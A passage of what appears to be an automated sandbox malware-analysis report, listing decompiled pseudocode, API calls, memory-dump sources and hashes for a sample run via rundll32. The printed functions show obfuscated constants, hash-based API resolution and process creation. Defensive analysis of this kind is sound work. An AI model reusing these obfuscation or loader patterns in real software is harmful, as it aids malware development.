				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x7c320c = _a4;
					if(E007AF8FD() != 0) {
						E007A93ED(); // executed
					}
				}
				return 1;
			}

0x007ae997
0x007ae99d
0x007ae9a4
0x007ae9ab
0x007ae9b2
0x007ae9b9
0x007ae9c0
0x007ae9c7
0x007ae9d3
0x007ae9d8
0x007ae9dd
0x007ae9e1
0x007ae9e8
0x007ae9ef
0x007ae9f6
0x007ae9fd
0x007aea02
0x007aea07
0x007aea0e
0x007aea15
0x007aea19
0x007aea1a
0x007aea1d
0x007aea24
0x007aea2f
0x007aea32
0x007aea39
0x007aea40
0x007aea47
0x007aea53
0x007aea56
0x007aea5d
0x007aea5d
0x007aea60
0x007aea65
0x007aea77
0x007aea88
0x007aea8d
0x007aea77
0x007aea96

Strings

].u, xrefs: 007AEA15
d,, xrefs: 007AE9AB

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: ].u$d,
API String ID: 621844428-1507873175
Opcode ID: a61575ab00cbc63ade69d6de2ac73ad0ff0d17d680639819f673cb3207a5ad69
Instruction ID: 2db5a90a53950e597b55d8b22c8d94ec83ca4aaa0fa7aca8b5a022d805b6062c
Opcode Fuzzy Hash: a61575ab00cbc63ade69d6de2ac73ad0ff0d17d680639819f673cb3207a5ad69
Instruction Fuzzy Hash: 7D31F471E00209EBDB08DFA4C98A5AEBBF0FB55304F20C199D510BB254D7B45B959F80

Uniqueness

Uniqueness Score: -1.00%

Function 007AAB87 Relevance: 1.4, Strings: 1, Instructions: 154
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E007AAB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E007B20B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E007A4B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E007A7F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E007B1E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E007B1E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}

0x007aab88
0x007aab94
0x007aab97
0x007aab9a
0x007aab9d
0x007aab9f
0x007aaba2
0x007aaba3
0x007aaba6
0x007aabaa
0x007aabab
0x007aabb0
0x007aabb6
0x007aabbd
0x007aabc4
0x007aabcb
0x007aabd2
0x007aabd6
0x007aabdd
0x007aabe4
0x007aabeb
0x007aabf2
0x007aabf9
0x007aac00
0x007aac09
0x007aac0e
0x007aac13
0x007aac1a
0x007aac21
0x007aac28
0x007aac2f
0x007aac36
0x007aac3d
0x007aac44
0x007aac4b
0x007aac52
0x007aac59
0x007aac60
0x007aac67
0x007aac6e
0x007aac75
0x007aac79
0x007aac80
0x007aac87
0x007aac8e
0x007aac91
0x007aac98
0x007aac9f
0x007aaca3
0x007aacaa
0x007aacb1
0x007aacb8
0x007aacbc
0x007aacc3
0x007aacca
0x007aaccd
0x007aacd4
0x007aacdb
0x007aace2
0x007aace9
0x007aaced
0x007aacf4
0x007aacfb
0x007aad05
0x007aad08
0x007aad0b
0x007aad16
0x007aad19
0x007aad20
0x007aad2c
0x007aad31
0x007aad31
0x007aad34
0x007aad37
0x007aad3e
0x007aad45
0x007aad4c
0x007aad50
0x007aad57
0x007aad5a
0x007aad5f
0x007aad62
0x007aad6a
0x007aad6d
0x007aad74
0x007aad94
0x007aad9e
0x007aaddd
0x007aada0
0x007aada2
0x007aadbf
0x007aadd3
0x007aada4
0x007aada7
0x007aada8
0x007aada9
0x007aadaa
0x007aadaa
0x007aadad
0x007aadad
0x007aade5

Strings

nJQ, xrefs: 007AABC4

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: nJQ
API String ID: 963392458-2884827605
Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
Instruction ID: b2fe9c4ed9b2de121b9fee68c8cb62339ea47c5c2f6e230a9108fbabca53d9b3
Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
Instruction Fuzzy Hash: 6C71F272401288EBCF59CFA4C9499CE3BA1FF48358F508219FE1696224D3B6C969DF45

Uniqueness

Uniqueness Score: -1.00%

Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 10006A9C

Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54

Uniqueness

Uniqueness Score: -1.00%

Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
GlobalHandle.KERNEL32(002389A8), ref: 100208A9
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
GlobalHandle.KERNEL32(002389A8), ref: 100208DB
GlobalLock.KERNEL32 ref: 100208E2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
GlobalLock.KERNEL32 ref: 100208F8
_memset.LIBCMT ref: 10020911
LeaveCriticalSection.KERNEL32(?), ref: 1002093D

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002FA87

Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1

___sbh_find_block.LIBCMT ref: 1002FA92
___sbh_free_block.LIBCMT ref: 1002FAA1
HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15

Uniqueness

Uniqueness Score: -1.00%

Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007A7F5D Relevance: 1.6, APIs: 1, Instructions: 54
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,007AAD99,?,?,?,181C8C04,007AAD99), ref: 007A7FEB

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction ID: ef960b7bff7029fbfba0fdd3ae396d50b932be9d5c29468ff46302a72f8d3604
Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction Fuzzy Hash: 6D11D672402118FBDF61AF91DD09CDF7F79EF093A4F149144F91921121D2768A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B46BB Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E007B46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E007B20B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E007BAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}

0x007b46d5
0x007b46da
0x007b46e4
0x007b46ec
0x007b46f3
0x007b46f7
0x007b46fe
0x007b4705
0x007b470c
0x007b4724
0x007b4735
0x007b473b

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 007B4735

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction ID: 024d6523658e76b8d108829f1e54fd2c943a17105785fb3beb23d02f361b4d84
Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction Fuzzy Hash: BA012C75802218FBCF15AFD5DC098DFBFB8EF45394F108145F91826212D2758A60DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 007A93ED Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E007A93ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E007BAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}

0x007a93f3
0x007a9405
0x007a9411
0x007a9412
0x007a9413
0x007a941a
0x007a9421
0x007a9428
0x007a9433
0x007a9436
0x007a943d
0x007a9444
0x007a9451
0x007a945b

APIs

ExitProcess.KERNELBASE(00000000), ref: 007A945B

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction ID: 98646d7ffc9175e089d54bae4e87009860a944e12484a4dbcc4400bf8d707155
Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction Fuzzy Hash: 04F03C71D01308FBEB04DBE8DA46A9DFBF4EB50314F2081A9D604B3261E7745F459A91

Uniqueness

Uniqueness Score: -1.00%

Function 007AB23C Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E007AB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007B20B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
